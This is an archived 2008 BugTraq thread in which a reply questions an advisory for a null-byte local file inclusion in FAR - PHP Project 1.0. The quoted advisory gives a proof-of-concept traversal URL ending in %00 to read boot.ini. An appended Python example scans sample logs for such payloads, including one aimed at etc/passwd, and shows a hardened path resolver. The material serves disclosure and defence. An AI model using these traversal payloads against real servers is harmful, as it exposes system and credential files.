BugTraq
Null Byte Local file Inclusion in FAR - PHP Project version:1.0 Aug 21 2008 02:56AM
beenudel1986 gmail com (1 replies)
Re: Null Byte Local file Inclusion in FAR - PHP Project version:1.0 Aug 22 2008 01:46AM
William McAfee (sec-community thegoodhacker com)
I'm sorry, but your screenshot actually leads me to not have much more
confidence. I noticed your titlebar is modified, so that tells me the
script is most likely modified in some way. Provide us with a pure
script, please. Also, on an unrelated note, why are you running
professional? Why did you blank out the bottom half of the window?
What are you hiding?

On Wed, 2008-08-20 at 20:56 -0600, beenudel1986 (at) gmail (dot) com wrote:
> ################################################################
> # .___ __ _______ .___ #
> # __| _/____ _______| | __ ____ \ _ \ __| _/____ #
> # / __ |\__ \\_ __ \ |/ // ___\/ /_\ \ / __ |/ __ \ #
> # / /_/ | / __ \| | \/ <\ \___\ \_/ \/ /_/ \ ___/ #
> # \____ |(______/__| |__|_ \\_____>\_____ /\_____|\____\ #
> # \/ \/ \/ #
> # ___________ ______ _ __ #
> # _/ ___\_ __ \_/ __ \ \/ \/ / #
> # \ \___| | \/\ ___/\ / #
> # \___ >__| \___ >\/\_/ #
> # est.2007 \/ \/ forum.darkc0de.com #
>
> ################################################################
>
> # Web Application: FAR - PHP Project version:1.0
> # Vendor's Address :www.far-php.ro
> ################################################################
>
>
> ################################################################
> Author: Beenu Arora
> Address: www.beenuarora.com
> ################################################################
>
>
> #Python Dark Scripts: www.beenuarora.com/work.html
>
> ################################################################
> #Date Found: 21/08/08
> #Severity: High
> #Security Risk: Null Byte File Retrieval
> #Explanation: It is possible to view the contents of any file (e.g. databases, user information or configuration files) on the web server (under the permission restrictions of the web server user)
>
>
> #POC: http://localhost/farver/index.php?c=/../../../../../../../../boot.ini%00
>
> #For the POC pic visit: www.beenuarora.com/POC.bmp
>
> ################################################################
> ______________________________________________________________________________________
> |Greetz: D3hydr8,rascal,rsauron,patrick,baltazar,sinner_01 and rest of team members. |
> |_____________________________________________________________________________________|

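The advisory above describes the classic null-byte LFI pattern (a PHP include of a user-controlled path where, on older PHP builds, `%00` truncates the appended extension). Below is an added defender-side example, not code from the original post or from the FAR-PHP project: a log check that flags the traversal-plus-NUL pattern from the PoC in constructed access-log lines, and a hardened path resolver that rejects NUL bytes and anything escaping a hypothetical web root.

```python
import os
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample access-log lines modelled on the PoC URL; not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [21/Aug/2008:02:56:01 -0600] "GET /farver/index.php?c=home HTTP/1.1" 200 812
10.0.0.7 - - [21/Aug/2008:02:56:09 -0600] "GET /farver/index.php?c=/../../../../../../../../boot.ini%00 HTTP/1.1" 200 310
10.0.0.9 - - [21/Aug/2008:02:57:11 -0600] "GET /farver/index.php?c=..%2f..%2fetc%2fpasswd%00 HTTP/1.1" 200 1200
10.0.0.9 - - [21/Aug/2008:02:58:00 -0600] "GET /farver/index.php?c=news HTTP/1.1" 200 640
"""

REQ_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')


def suspicious_params(url):
    """Return (param, reason) pairs for query values that carry a NUL byte
    or a parent-directory segment. parse_qs percent-decodes, so %00 and %2f
    are examined after decoding, the same way the vulnerable include sees them."""
    hits = []
    for name, values in parse_qs(urlsplit(url).query, keep_blank_values=True).items():
        for value in values:
            if "\x00" in value:
                hits.append((name, "nul-byte truncation"))
            if ".." in re.split(r"[\\/]", value):
                hits.append((name, "directory traversal"))
    return hits


def scan_log(text):
    """Run suspicious_params over each request line; return (client_ip, param, reason)."""
    findings = []
    for line in text.splitlines():
        match = REQ_RE.search(line)
        if match:
            client_ip = line.split(" ", 1)[0]
            findings.extend((client_ip, p, r) for p, r in suspicious_params(match.group(1)))
    return findings


def safe_resolve(webroot, value, extension=".php"):
    """Hardened counterpart to include($dir . $c . '.php'): refuse NUL bytes
    outright, then resolve the path and require it to stay under webroot.
    webroot is a hypothetical directory; only path strings are manipulated."""
    if "\x00" in value:
        raise ValueError("NUL byte in path parameter")
    root = os.path.realpath(webroot)
    target = os.path.realpath(os.path.join(root, value + extension))
    if os.path.commonpath([root, target]) != root:
        raise ValueError("path escapes web root")
    return target


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print("ALERT %s param=%s reason=%s" % finding)
```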
Copyright 2009, SecurityFocus